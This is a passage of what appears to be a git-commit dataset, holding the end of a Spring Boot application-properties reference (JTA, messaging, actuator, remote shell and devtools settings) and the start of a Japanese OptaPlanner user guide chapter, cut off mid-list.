acquired.\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections.\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving.\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool.\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections.\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions.\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache.\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.datasource.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.properties.allow-multiple-lrc=false # Allow multiple LRC resources to be enlisted into the same transaction.\n spring.jta.bitronix.properties.asynchronous2-pc=false # Enable asynchronously execution of two phase commit.\n spring.jta.bitronix.properties.background-recovery-interval-seconds=60 # Interval in seconds at which to run the recovery process in the background.\n spring.jta.bitronix.properties.current-node-only-recovery=true # Recover only the current node.\n spring.jta.bitronix.properties.debug-zero-resource-transaction=false # Log the creation and commit call stacks of transactions executed without a single enlisted resource.\n spring.jta.bitronix.properties.default-transaction-timeout=60 # Default transaction timeout in seconds.\n spring.jta.bitronix.properties.disable-jmx=false # Enable JMX support.\n spring.jta.bitronix.properties.exception-analyzer= # Set the fully qualified name of the exception analyzer implementation to use.\n spring.jta.bitronix.properties.filter-log-status=false # Enable filtering of logs so that only mandatory logs are written.\n spring.jta.bitronix.properties.force-batching-enabled=true # Set if disk forces are batched.\n spring.jta.bitronix.properties.forced-write-enabled=true # Set if logs are forced to disk.\n spring.jta.bitronix.properties.graceful-shutdown-interval=60 # Maximum amount of seconds the TM will wait for transactions to get done before aborting them at shutdown time.\n spring.jta.bitronix.properties.jndi-transaction-synchronization-registry-name= # JNDI name of the TransactionSynchronizationRegistry.\n spring.jta.bitronix.properties.jndi-user-transaction-name= # JNDI name of the UserTransaction.\n spring.jta.bitronix.properties.journal=disk # Name of the journal. Can be 'disk', 'null' or a class name.\n spring.jta.bitronix.properties.log-part1-filename=btm1.tlog # Name of the first fragment of the journal.\n spring.jta.bitronix.properties.log-part2-filename=btm2.tlog # Name of the second fragment of the journal.\n spring.jta.bitronix.properties.max-log-size-in-mb=2 # Maximum size in megabytes of the journal fragments.\n spring.jta.bitronix.properties.resource-configuration-filename= # ResourceLoader configuration file name.\n spring.jta.bitronix.properties.server-id= # ASCII ID that must uniquely identify this TM instance. Default to the machine's IP address.\n spring.jta.bitronix.properties.skip-corrupted-logs=false # Skip corrupted transactions log entries.\n spring.jta.bitronix.properties.warn-about-zero-resource-transaction=true # Log a warning for transactions executed without a single enlisted resource.\n\n\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProperties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.features=SYNC_DELAY # Comma-separated list of features to enable.\n\tspring.mongodb.embedded.version=2.6.10 # Version of Mongo to use.\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database=0 # Database index used by the connection factory.\n\tspring.redis.host=localhost # Redis server host.\n\tspring.redis.password= # Login password of the redis server.\n\tspring.redis.pool.max-active=8 # Max number of connections that can be allocated by the pool at a given time. Use a negative value for no limit.\n\tspring.redis.pool.max-idle=8 # Max number of \"idle\" connections in the pool. Use a negative value to indicate an unlimited number of idle connections.\n\tspring.redis.pool.max-wait=-1 # Maximum amount of time (in milliseconds) a connection allocation should block before throwing an exception when the pool is exhausted. Use a negative value to block indefinitely.\n\tspring.redis.pool.min-idle=0 # Target for the minimum number of idle connections to maintain in the pool. This setting only has an effect if it is positive.\n\tspring.redis.port=6379 # Redis server port.\n\tspring.redis.sentinel.master= # Name of Redis server.\n\tspring.redis.sentinel.nodes= # Comma-separated list of host:port pairs.\n\tspring.redis.timeout=0 # Connection timeout in milliseconds.\n\n\n\t# ----------------------------------------\n\t# INTEGRATION PROPERTIES\n\t# ----------------------------------------\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url= # URL of the ActiveMQ broker. Auto-generated by default. For instance `tcp:\/\/localhost:61616`\n\tspring.activemq.in-memory=true # Specify if the default broker URL should be in memory. Ignored if an explicit broker has been specified.\n\tspring.activemq.password= # Login password of the broker.\n\tspring.activemq.pooled=false # Specify if a PooledConnectionFactory should be created instead of a regular ConnectionFactory.\n\tspring.activemq.user= # Login user of the broker.\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.artemis.embedded.data-directory= # Journal file directory. Not necessary if persistence is turned off.\n\tspring.artemis.embedded.enabled=true # Enable embedded mode if the Artemis server APIs are available.\n\tspring.artemis.embedded.persistent=false # Enable persistent store.\n\tspring.artemis.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.artemis.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.artemis.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.artemis.host=localhost # Artemis broker host.\n\tspring.artemis.mode= # Artemis deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.artemis.port=61616 # Artemis broker port.\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.initializer.enabled=true # Create the required batch tables on startup if necessary.\n\tspring.batch.job.enabled=true # Execute all Spring Batch jobs in the context on startup.\n\tspring.batch.job.names= # Comma-separated list of job names to execute on startup (For instance `job1,job2`). By default, all Jobs found in the context are executed.\n\tspring.batch.schema=classpath:org\/springframework\/batch\/core\/schema-@@platform@@.sql # Path to the SQL file to use to initialize the database schema.\n\tspring.batch.table-prefix= # Table prefix for all the batch meta-data tables.\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.hornetq.embedded.data-directory= # Journal file directory. Not necessary if persistence is turned off.\n\tspring.hornetq.embedded.enabled=true # Enable embedded mode if the HornetQ server APIs are available.\n\tspring.hornetq.embedded.persistent=false # Enable persistent store.\n\tspring.hornetq.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.hornetq.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.hornetq.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.hornetq.host=localhost # HornetQ broker host.\n\tspring.hornetq.mode= # HornetQ deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.hornetq.port=5445 # HornetQ broker port.\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # Connection factory JNDI name. When set, takes precedence to others connection factory auto-configurations.\n\tspring.jms.listener.acknowledge-mode= # Acknowledge mode of the container. By default, the listener is transacted with automatic acknowledgment.\n\tspring.jms.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.jms.listener.concurrency= # Minimum number of concurrent consumers.\n\tspring.jms.listener.max-concurrency= # Maximum number of concurrent consumers.\n\tspring.jms.pub-sub-domain=false # Specify if the default destination type is topic.\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # Comma-separated list of addresses to which the client should connect to.\n\tspring.rabbitmq.dynamic=true # Create an AmqpAdmin bean.\n\tspring.rabbitmq.host=localhost # RabbitMQ host.\n\tspring.rabbitmq.listener.acknowledge-mode= # Acknowledge mode of container.\n\tspring.rabbitmq.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.rabbitmq.listener.concurrency= # Minimum number of consumers.\n\tspring.rabbitmq.listener.max-concurrency= # Maximum number of consumers.\n\tspring.rabbitmq.listener.prefetch= # Number of messages to be handled in a single request. It should be greater than or equal to the transaction size (if used).\n\tspring.rabbitmq.listener.transaction-size= # Number of messages to be processed in a transaction. For best results it should be less than or equal to the prefetch count.\n\tspring.rabbitmq.password= # Login to authenticate against the broker.\n\tspring.rabbitmq.port=5672 # RabbitMQ port.\n\tspring.rabbitmq.requested-heartbeat= # Requested heartbeat timeout, in seconds; zero for none.\n\tspring.rabbitmq.ssl.enabled=false # Enable SSL support.\n\tspring.rabbitmq.ssl.key-store= # Path to the key store that holds the SSL certificate.\n\tspring.rabbitmq.ssl.key-store-password= # Password used to access the key store.\n\tspring.rabbitmq.ssl.trust-store= # Trust store that holds SSL certificates.\n\tspring.rabbitmq.ssl.trust-store-password= # Password used to access the trust store.\n\tspring.rabbitmq.username= # Login user to authenticate to the broker.\n\tspring.rabbitmq.virtual-host= # Virtual host to use when connecting to the broker.\n\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.enabled=true # Enable endpoints.\n\tendpoints.sensitive= # Default endpoint sensitive setting.\n\tendpoints.actuator.enabled=true # Enable the endpoint.\n\tendpoints.actuator.path= # Endpoint URL path.\n\tendpoints.actuator.sensitive=false # Enable security on the endpoint.\n\tendpoints.autoconfig.enabled= # Enable the endpoint.\n\tendpoints.autoconfig.id= # Endpoint identifier.\n\tendpoints.autoconfig.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.beans.enabled= # Enable the endpoint.\n\tendpoints.beans.id= # Endpoint identifier.\n\tendpoints.beans.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.configprops.enabled= # Enable the endpoint.\n\tendpoints.configprops.id= # Endpoint identifier.\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized. Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.configprops.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.docs.curies.enabled=false # Enable the curie generation.\n\tendpoints.docs.enabled=true # Enable actuator docs endpoint.\n\tendpoints.docs.path=\/docs #\n\tendpoints.docs.sensitive=false #\n\tendpoints.dump.enabled= # Enable the endpoint.\n\tendpoints.dump.id= # Endpoint identifier.\n\tendpoints.dump.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.env.enabled= # Enable the endpoint.\n\tendpoints.env.id= # Endpoint identifier.\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized. Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.env.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.flyway.enabled= # Enable the endpoint.\n\tendpoints.flyway.id= # Endpoint identifier.\n\tendpoints.flyway.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.enabled= # Enable the endpoint.\n\tendpoints.health.id= # Endpoint identifier.\n\tendpoints.health.mapping.*= # Mapping of health statuses to HttpStatus codes. By default, registered health statuses map to sensible defaults (i.e. UP maps to 200).\n\tendpoints.health.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.time-to-live=1000 # Time to live for cached result, in milliseconds.\n\tendpoints.info.enabled= # Enable the endpoint.\n\tendpoints.info.id= # Endpoint identifier.\n\tendpoints.info.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.jolokia.enabled=true # Enable Jolokia endpoint.\n\tendpoints.jolokia.path=\/jolokia # Endpoint URL path.\n\tendpoints.jolokia.sensitive=true # Enable security on the endpoint.\n\tendpoints.liquibase.enabled= # Enable the endpoint.\n\tendpoints.liquibase.id= # Endpoint identifier.\n\tendpoints.liquibase.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.logfile.enabled=true # Enable the endpoint.\n\tendpoints.logfile.path=\/logfile # Endpoint URL path.\n\tendpoints.logfile.sensitive=true # Enable security on the endpoint.\n\tendpoints.mappings.enabled= # Enable the endpoint.\n\tendpoints.mappings.id= # Endpoint identifier.\n\tendpoints.mappings.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.metrics.enabled= # Enable the endpoint.\n\tendpoints.metrics.filter.enabled=true # Enable the metrics servlet filter.\n\tendpoints.metrics.id= # Endpoint identifier.\n\tendpoints.metrics.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.shutdown.enabled= # Enable the endpoint.\n\tendpoints.shutdown.id= # Endpoint identifier.\n\tendpoints.shutdown.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.trace.enabled= # Enable the endpoint.\n\tendpoints.trace.id= # Endpoint identifier.\n\tendpoints.trace.sensitive= # Mark if the endpoint exposes sensitive information.\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/EndpointCorsProperties.{sc-ext}[EndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # Set whether credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-headers= # Comma-separated list of headers to allow in a request. '*' allows all headers.\n\tendpoints.cors.allowed-methods=GET # Comma-separated list of methods to allow. '*' allows all methods.\n\tendpoints.cors.allowed-origins= # Comma-separated list of origins to allow. '*' allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.exposed-headers= # Comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # How long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.domain= # JMX domain name. Initialized with the value of 'spring.jmx.default-domain' if set.\n\tendpoints.jmx.enabled=true # Enable JMX export of all endpoints.\n\tendpoints.jmx.static-names= # Additional static properties to append to all ObjectNames of MBeans representing Endpoints.\n\tendpoints.jmx.unique-names=false # Ensure that ObjectNames are modified in case of conflict.\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.add-application-context-header=true # Add the \"X-Application-Context\" HTTP header in each response.\n\tmanagement.address= # Network address that the management endpoints should bind to.\n\tmanagement.context-path= # Management endpoint context-path. For instance `\/actuator`\n\tmanagement.port= # Management endpoint HTTP port. Use the same port as the application by default.\n\tmanagement.security.enabled=true # Enable security.\n\tmanagement.security.role=ADMIN # Role required to access the management endpoint.\n\tmanagement.security.sessions=stateless # Session creating policy to use (always, never, if_required, stateless).\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true # Enable database health check.\n\tmanagement.health.defaults.enabled=true # Enable default health indicators.\n\tmanagement.health.diskspace.enabled=true # Enable disk space health check.\n\tmanagement.health.diskspace.path= # Path used to compute the available disk space.\n\tmanagement.health.diskspace.threshold=0 # Minimum disk space that should be available, in bytes.\n\tmanagement.health.elasticsearch.enabled=true # Enable elasticsearch health check.\n\tmanagement.health.elasticsearch.indices= # Comma-separated index names.\n\tmanagement.health.elasticsearch.response-timeout=100 # The time, in milliseconds, to wait for a response from the cluster.\n\tmanagement.health.jms.enabled=true # Enable JMS health check.\n\tmanagement.health.mail.enabled=true # Enable Mail health check.\n\tmanagement.health.mongo.enabled=true # Enable MongoDB health check.\n\tmanagement.health.rabbit.enabled=true # Enable RabbitMQ health check.\n\tmanagement.health.redis.enabled=true # Enable Redis health check.\n\tmanagement.health.solr.enabled=true # Enable Solr health check.\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP # Comma-separated list of health statuses in order of severity.\n\n\t# TRACING (({sc-spring-boot-actuator}\/trace\/TraceProperties.{sc-ext}[TraceProperties])\n\tmanagement.trace.include=request-headers,response-headers,errors # Items to be included in the trace.\n\n\t# REMOTE SHELL\n\tshell.auth=simple # Authentication type. Auto-detected according to the environment.\n\tshell.auth.jaas.domain=my-domain # JAAS domain.\n\tshell.auth.key.path= # Path to the authentication key. This should point to a valid \".pem\" file.\n\tshell.auth.simple.user.name=user # Login user.\n\tshell.auth.simple.user.password= # Login password.\n\tshell.auth.spring.roles=ADMIN # Comma-separated list of required roles to login to the CRaSH console.\n\tshell.command-path-patterns=classpath*:\/commands\/**,classpath*:\/crash\/commands\/** # Patterns to use to look for commands.\n\tshell.command-refresh-interval=-1 # Scan for changes and update the command if necessary (in seconds).\n\tshell.config-path-patterns=classpath*:\/crash\/* # Patterns to use to look for configurations.\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # Comma-separated list of commands to disable.\n\tshell.disabled-plugins= # Comma-separated list of plugins to disable. Certain plugins are disabled by default based on the environment.\n\tshell.ssh.auth-timeout = # Number of milliseconds after user will be prompted to login again.\n\tshell.ssh.enabled=true # Enable CRaSH SSH support.\n\tshell.ssh.idle-timeout = # Number of milliseconds after which unused connections are closed.\n\tshell.ssh.key-path= # Path to the SSH server key.\n\tshell.ssh.port=2000 # SSH port.\n\tshell.telnet.enabled=false # Enable CRaSH telnet support. Enabled by default if the TelnetPlugin is available.\n\tshell.telnet.port=5000 # Telnet port.\n\n\t# GIT INFO\n\tspring.git.properties= # Resource reference to a generated git info properties file.\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.aggregate.key-pattern= # Pattern that tells the aggregator what to do with the keys from the source repository.\n\tspring.metrics.export.aggregate.prefix= # Prefix for global repository if active.\n\tspring.metrics.export.delay-millis=5000 # Delay in milliseconds between export ticks. Metrics are exported to external sources on a schedule with this delay.\n\tspring.metrics.export.enabled=true # Flag to enable metric export (assuming a MetricWriter is available).\n\tspring.metrics.export.excludes= # List of patterns for metric names to exclude. Applied after the includes.\n\tspring.metrics.export.includes= # List of patterns for metric names to include.\n\tspring.metrics.export.redis.key=keys.spring.metrics # Key for redis repository export (if active).\n\tspring.metrics.export.redis.prefix=spring.metrics # Prefix for redis repository if active.\n\tspring.metrics.export.send-latest= # Flag to switch off any available optimizations based on not exporting unchanged metric values.\n\tspring.metrics.export.statsd.host= # Host of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.port=8125 # Port of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.prefix= # Prefix for statsd exported metrics.\n\tspring.metrics.export.triggers.*= # Specific trigger properties per MetricWriter bean name.\n\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n\t# DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n\tspring.devtools.livereload.enabled=true # Enable a livereload.com compatible server.\n\tspring.devtools.livereload.port=35729 # Server port.\n\tspring.devtools.restart.additional-exclude= # Additional patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.additional-paths= # Additional paths to watch for changes.\n\tspring.devtools.restart.enabled=true # Enable automatic restart.\n\tspring.devtools.restart.exclude=META-INF\/maven\/**,META-INF\/resources\/**,resources\/**,static\/**,public\/**,templates\/**,**\/*Test.class,**\/*Tests.class,git.properties # Patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.poll-interval=1000 # Amount of time (in milliseconds) to wait between polling for classpath changes.\n\tspring.devtools.restart.quiet-period=400 # Amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered.\n\tspring.devtools.restart.trigger-file= # Name of a specific file that when changed will trigger the restart check. If not specified any classpath file change will trigger the restart.\n\n\t# REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n\tspring.devtools.remote.context-path=\/.~~spring-boot!~ # Context path used to handle the remote connection.\n\tspring.devtools.remote.debug.enabled=true # Enable remote debug support.\n\tspring.devtools.remote.debug.local-port=8000 # Local remote debug server port.\n\tspring.devtools.remote.proxy.host= # The host of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.proxy.port= # The port of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.restart.enabled=true # Enable remote restart.\n\tspring.devtools.remote.secret= # A shared secret required to establish a connection (required to enable remote support).\n\tspring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret.\n\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdd19ccb86c18ebd75cb87f27acd075b782d64da","subject":"fix 404 on japanese image","message":"fix 404 on japanese image\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"localized\/ja\/UserGuide-chapter1.adoc","new_file":"localized\/ja\/UserGuide-chapter1.adoc","new_contents":"= Chapter 1. OptaPlanner \u30a4\u30f3\u30c8\u30ed\u30c0\u30af\u30b7\u30e7\u30f3\n:awestruct-description: Chapter 1. OptaPlanner \u30a4\u30f3\u30c8\u30ed\u30c0\u30af\u30b7\u30e7\u30f3\n:awestruct-layout: localizedBase\n:awestruct-lang: ja\n:awestruct-priority: 1.0\n:showtitle:\n\n\n\nxref:whatIsOptaPlanner[1.1. OptaPlanner \u3068\u306f\u4f55\u3067\u3059\u304b\uff1f]:: \nxref:requirements[1.2. \u5fc5\u8981\u306a\u3082\u306e]:: \nxref:whatIsAPlanningProblem[1.3. \u8a08\u753b\u554f\u984c\u3068\u306f\uff1f]:: \nxref:aPlanningProblemIsNPCompleteOrNPHard[1.3.1. \u8a08\u753b\u554f\u984c\u306f NP \u5b8c\u5168\u307e\u305f\u306f NP \u56f0\u96e3]::: \nxref:aPlanningProblemHasConstraints[1.3.2. \u8a08\u753b\u554f\u984c\u306b\u306f\u5236\u7d04\u304c\u3042\u308b\uff08\u30cf\u30fc\u30c9, \u30bd\u30d5\u30c8\u5236\u7d04\uff09]::: \nxref:aPlanningProblemHasAHugeSearchSpace[1.3.3. \u8a08\u753b\u554f\u984c\u306f\u5de8\u5927\u306a\u63a2\u7d22\u7a7a\u9593\u3092\u6301\u3064]::: \nxref:downloadAndRunTheExamples[1.4. \u30b5\u30f3\u30d7\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c]:: \nxref:getTheReleaseZipAndRunTheExamples[1.4.1. \u516c\u958b .zip \u306e\u5165\u624b\u3068\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c]::: \nxref:runTheExamplesInAnIDE[1.4.2. IDE (IntelliJ, Eclipse, NetBeans) \u3067\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c]::: \nxref:useWithMavenGradleEtc[1.4.3. OptaPlanner \u3092 Maven \u3084 Gradle, Ivy, Buildr, ANT \u3068\u3068\u3082\u306b\u4f7f\u3046]::: \nxref:buildFromSource[1.4.4. OptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b]::: \nxref:governance[1.5. \u7ba1\u7406\u30fb\u904b\u55b6]:: \nxref:statusOfOptaPlanner[1.5.1. OptaPlanner \u306e\u30ec\u30d9\u30eb\u306e\u9ad8\u3055]::: \nxref:backwardsCompatibility[1.5.2. \u5f8c\u65b9\u4e92\u63db\u6027]::: \nxref:communityAndSupport[1.5.3. \u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u3068\u30b5\u30dd\u30fc\u30c8]::: \nxref:relationshipWithKie[1.5.4. Drools \u3084 jBPM \u3068\u306e\u95a2\u4fc2]::: \n\n[]\n[[whatIsOptaPlanner]]\n== 1.1 OptaPlanner \u3068\u306f\u4f55\u3067\u3059\u304b\uff1f\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/optaPlannerLogo.png[]\n\n*link:https:\/\/www.optaplanner.org\/[OptaPlanner] \u306f\u3001\u8a08\u753b\u554f\u984c\u306e\u6700\u9069\u89e3\u3092\u5f97\u308b\u3001\u7d44\u307f\u8fbc\u307f\u53ef\u80fd\u3067\u8efd\u91cf\u306a\u5236\u7d04\u5145\u8db3\u30a8\u30f3\u30b8\u30f3\u3067\u3059\u3002* \u6b21\u306e\u3088\u3046\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u3092\u89e3\u304d\u307e\u3059\u3002\n\/\/\/\/\n150907 by Takugo\nSource: which optimizes planning problems\nInterpreted as: which obtains optimized solutions for planning problems\n\u201c\u554f\u984c\u201d\u3092\u6700\u9069\u5316\u3059\u308b\u306e\u3067\u306f\u306a\u3044\u304b\u3089\u3002\n\/\/\/\/\n\n* *\u5f93\u696d\u54e1\u30b7\u30d5\u30c8\u52e4\u52d9\u8a08\u753b:* \u770b\u8b77\u5e2b\u3084\u4fee\u7406\u5de5\u306a\u3069\u306e\u52e4\u52d9\u8868\u4f5c\u6210\n* *\u5b9f\u65bd\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u4f1a\u8b70, \u8a2d\u5099, \u30e1\u30f3\u30c6\u30ca\u30f3\u30b9\u4f5c\u696d, \u5e83\u544a\u306a\u3069\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0\n* *\u6559\u80b2\u6642\u9593\u5272\u308a:* \u6388\u696d, \u8b1b\u5ea7, \u8a66\u9a13, \u4f1a\u8b70\u30d7\u30ec\u30bc\u30f3\u30c6\u30fc\u30b7\u30e7\u30f3\u306a\u3069\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0\n* *\u8f38\u9001\u7d4c\u8def\u8a08\u753b:* \u8377\u7269\u304a\u3088\u3073\uff0f\u307e\u305f\u306f\u4eba\u3092\u4e57\u305b\u305f\u4e57\u308a\u7269 (\u30c8\u30e9\u30c3\u30af, \u5217\u8eca, \u8239\u8236, \u98db\u884c\u6a5f\u306a\u3069) \u306e\u8a08\u753b\n* *\u7bb1\u8a70\u3081\uff08\u30d3\u30f3\u30d1\u30c3\u30ad\u30f3\u30b0\uff09:* \u30b3\u30f3\u30c6\u30ca, \u30c8\u30e9\u30c3\u30af, \u8239\u8236\u3078\u306e\u7a4d\u8f09\u3084\u5009\u5eab\u3078\u306e\u4fdd\u7ba1, \u3055\u3089\u306b\u306f\u30af\u30e9\u30a6\u30c9\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u306e\u30ce\u30fc\u30c9\u306a\u3069\u3082\n* *\u6ce8\u6587\u751f\u7523\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u81ea\u52d5\u8eca\u7d44\u7acb\u30e9\u30a4\u30f3, \u6a5f\u68b0\u51e6\u7406, \u4eba\u54e1\u4f5c\u696d\u306a\u3069\u306e\u8a08\u753b\n* *\u5728\u5eab\u524a\u6e1b:* \u7d19\u3084\u92fc, \u30ab\u30fc\u30da\u30c3\u30c8\u306a\u3069\u306e\u5207\u65ad\u3067\u751f\u3058\u308b\u7121\u99c4\u306e\u6700\u5c11\u5316\n* *\u30b9\u30dd\u30fc\u30c4\u306b\u304a\u3051\u308b\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u30d5\u30c3\u30c8\u30dc\u30fc\u30eb\u3084\u91ce\u7403\u306a\u3069\u306e\u30ea\u30fc\u30b0\u6226\u8a08\u753b\n\/\/\/\/\n150907 by Takugo\nSource: planning football leagues, baseball leagues, ...\nInterpreted as: planning the league games of football, baseball, ...\n* *\u8ca1\u52d9\u6700\u9069\u5316:* \u6295\u8cc7\u30dd\u30fc\u30c8\u30d5\u30a9\u30ea\u30aa\u306e\u6700\u9069\u5316, 